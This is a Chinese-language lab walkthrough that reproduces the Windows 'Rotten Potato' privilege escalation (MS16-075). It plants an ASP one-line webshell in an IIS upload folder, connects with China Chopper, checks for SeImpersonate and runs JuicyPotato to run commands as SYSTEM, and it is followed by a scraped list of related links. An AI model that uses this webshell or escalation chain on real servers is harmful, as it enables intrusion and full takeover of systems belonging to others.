Windows-烂土豆提权

漏洞复现-烂土豆提权(MS16-075)

0x00 前言

烂土豆提权,即使用CVE-2016-3225(MS16-075)漏洞进行提权,当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。攻击者登录系统后,运行一个经特殊设计的应用程序利用此漏洞,从而控制受影响的系统。

影响版本:Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2012等,以上版本系统若未安装相应补丁,则大概率存在此漏洞。

靶机 攻击机
操作系统 Windows 10 Version 1903 kali
IP地址 192.168.12.140 192.168.12.135
备注 主机安装IIS 8.0,且已上传asp一句话木马

0x01 搭建靶场

Windows Server 2012服务器管理器”->点击“添加角色和功能
在“服务器角色”中勾选“Web 服务器(IIS)”。
在“角色服务”中,展开“应用程序开发”,勾选“.NET Extensibility 4.5”、“ASP”等打开默认站点所在的目录,一般为“C:\inetpub\wwwroot”,创建一个upload文件夹,并赋予相关权限。
在upload目录下创建shell.asp,内容为asp的一句话木马,此处直接模拟攻击者上传一句话木马。<%execute request("a")%>

0x02 漏洞复现

1、菜刀连接

2、打开虚拟终端,查看当前用户及用户权限。

 whoamiwhoami /priv

此处发现其拥有SeImpersonate权限。

3、使用菜刀上传漏洞利用工具,使用WebShell版的JuicyPotato工具JuicyPotatoweb。

4、在虚拟终端中,切换到upload目录,使用JuicyPotatoweb.exe执行如下命令进行提权。

 JuicyPotatoweb.exe -p "whoami"

Windows-烂土豆提权相关推荐

  1. 烂土豆提权(MS16-075)--令牌窃取提权

    漏洞介绍 当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞.成功利用此漏洞的攻击者可以使用提升的特权执行任意代码. 若要 ...

  2. winr8文件服务器,技术讨论 | Windows全版本提权之Win10系列解析

    原标题:技术讨论 | Windows全版本提权之Win10系列解析 一. 背景介绍 2018 年 8 月 27 日,境外安全研究人员 SandboxEscaper 在其个人主页上披露了影响 Windo ...

  3. Microsoft Windows Win32k本地提权漏洞分析

    漏洞信息 1 漏洞简介 漏洞名称:Microsoft Windows Win32k本地提权漏洞 漏洞编号:CVE-2015-2546 漏洞类型:UAF 影响范围:Windows 7 Service P ...

  4. 【经典漏洞回顾】Microsoft Windows Win32k本地提权漏洞分析(CVE-2015-0057)

    漏洞信息 1 漏洞简介 漏洞名称:Microsoft Windows Win32k本地提权漏洞 漏洞编号:CVE-2015-0057 漏洞类型:UAF 影响范围:Windows Server 2003 ...

  5. windows xp sp3 提权

    windows xp sp3 提权 0x00 前言 0x01 环境 0x02 过程 1. 添加新用户 2. 加入超级管理员分组 3. 启动远程桌面服务 4. 开启Telnet服务 5. 拿到目标的控制 ...

  6. 后渗透篇:Windows 2008 server提权之突破系统权限安装shift后门

    当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 Windows 2008 server提权之突破系统权限安装shift后门 0x01 前言 0x02 主要操作部分 0x03 主要命令组成 ...

  7. WINDOWS渗透与提权总结(1)

    旁站路径问题: 1.读网站配置. 2.用以下VBS: 01 On Error Resume Next 02   03 If (LCase(Right(WScript.Fullname, 11)) = ...

  8. Windows和linux提权方法,Windows与Linux本地用户提权体验(一)

    无论是Windows系统还是linux系统都是基于权限控制的,其严格的用户等级和权限是系统安全的有力保证.这么严密的用户权限是否不可逾越呢?下面笔者反其道而行之进行Windows及Linux下的提权测 ...

  9. 西部数据app可导致Windows 和 macOS 提权

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 西部数据(Western Digital)的EdgeRover 桌面 app的Windows 和 Mac 版本易受提权和沙箱逃逸漏洞影响,可导致 ...

最新文章

  1. 计算机网络- ARP(地址解析协议)
  2. python第四十一天---作业:简单FTP
  3. 三种常见中文内码的转换方法
  4. c语言不会可以学好java吗_C语言一定要学好吗?
  5. 生产服务器环境最小化安装后Centos 6.5优化配置备忘
  6. SpirngBoot整合MyBatis出现“SAXParseException”和“文件提前结束”异常解决办法
  7. 有多个重载参数pow_随时随地想充就充,同时最多能给三部手机充电的南卡无线充电宝POW-1体验...
  8. jq fileupload 设置最大文件大小5m_捷达将发布全新中大型SUV 或命名VS9/车长超5m
  9. jfinal html5,Jfinal框架整合webSocket技术功能实现
  10. initrd的启动过程
  11. presto是如何保证作业内存不会发生冲突和溢出
  12. 从JSON示例数据生成Web应用程序代码
  13. HALCON 20.11:深度学习笔记(12)---语义分割
  14. java java se_Java SE 9:尝试资源改进
  15. 系统学习深度学习(七)--主流深度学习开源框架对比
  16. 腾讯云服务器购买详细教程
  17. 四万字长文说operator new operator delete
  18. 兴趣题:猴子吃桃问题
  19. 戴尔电脑怎么安装一级计算机,戴尔电脑如何重装系统
  20. 安装 xorg-macros

热门文章

  1. Linux下的开源GIS现状
  2. G盘参数错误,要如何找回资料
  3. 【2020年领域新星】 吴尚哲 牛津大学
  4. [pyecharts学习笔记]——WordCloud词云图
  5. hadoop配置支持LZO压缩格式
  6. 切换引擎使用的批处理文件升级版, 好看了, 但是, 核心部分其实还是非常笨
  7. 适合女生在互联网的兼职副业:闲鱼无货源卖货教程月入10000+不是梦
  8. ON/安森美ISL9R3060G2车规FRD,原厂渠道ASEMI代理
  9. LS数字电子技术基础Multisim仿真系列 一 TTL门电路的仿真(74LS00)
  10. 【图的存储(二维数组方法)+图的遍历(dfs)】案例6-1.3 哥尼斯堡的“七桥问题”